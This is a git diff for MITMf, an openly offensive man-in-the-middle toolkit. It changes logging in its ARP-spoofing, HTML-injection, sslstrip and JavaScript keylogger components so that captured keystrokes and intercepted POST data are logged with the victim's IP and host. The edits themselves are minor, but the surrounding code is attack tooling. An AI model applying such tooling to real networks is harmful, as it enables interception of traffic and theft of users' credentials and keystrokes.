diff --git a/mitmf.py b/mitmf.py index 6b0b5ec..a55aadb 100755 --- a/mitmf.py +++ b/mitmf.py @@ -64,7 +64,7 @@ if __name__ == "__main__": log_level = logging.__dict__[args.log_level.upper()] #Start logging - logging.basicConfig(level=log_level, format='%(asctime)s %(message)s',stream=args.write) + logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S", stream=args.write) #All our options should be loaded now, pass them onto plugins print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py index cd71df4..753dcaf 100644 --- a/plugins/ArpSpoof.py +++ b/plugins/ArpSpoof.py @@ -60,7 +60,7 @@ class ArpSpoof(Plugin): def send_packets(self,pkt,interface): while self.send == True: - sendp(pkt, inter=2, iface=interface) + sendp(pkt, inter=2, iface=interface, verbose=False) def build_req(self): if self.target == None: diff --git a/plugins/Inject.py b/plugins/Inject.py index e36e169..82ce883 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -33,6 +33,8 @@ class Inject(CacheKill,Plugin): self.dtable = {} self.count = 0 self.mime = "text/html" + print "[*] %s plugin online" % self.name + def handleResponse(self,request,data): #We throttle to only inject once every two seconds per client @@ -46,7 +48,7 @@ class Inject(CacheKill,Plugin): self.ctable[ip] = time.time() self.dtable[ip+hn] = True self.count+=1 - logging.info("Injected malicious html.") + logging.info("%s [%s] Injected malicious html" % (request.client.getClientIP(), request.headers['host'])) return {'request':request,'data':data} else: return diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index ea30b67..b185eed 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -78,7 +78,7 @@ class ServerConnection(HTTPClient): #Handle the browserprofiler plugin output if 'clientprfl' in self.uri: out = pformat(self.post2dict(self.postData)) - logging.warning(str(self.client.getClientIP()) + " Browser Profilerer data:\n" + out) + logging.warning("%s Browser Profilerer data:\n%s" % (self.client.getClientIP(), out)) #Handle the jskeylogger plugin output elif 'keylog' in self.uri: @@ -99,10 +99,10 @@ class ServerConnection(HTTPClient): except: print "ERROR: unknown char " + n - logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + nice) + logging.warning("%s [%s] Keys: %s" % (self.client.getClientIP(), self.headers['host'], nice)) else: - logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) + logging.warning("%s Data (%s):\n%s" % (self.getPostPrefix(),self.headers['host'],self.postData)) self.transport.write(self.postData) def connectionMade(self):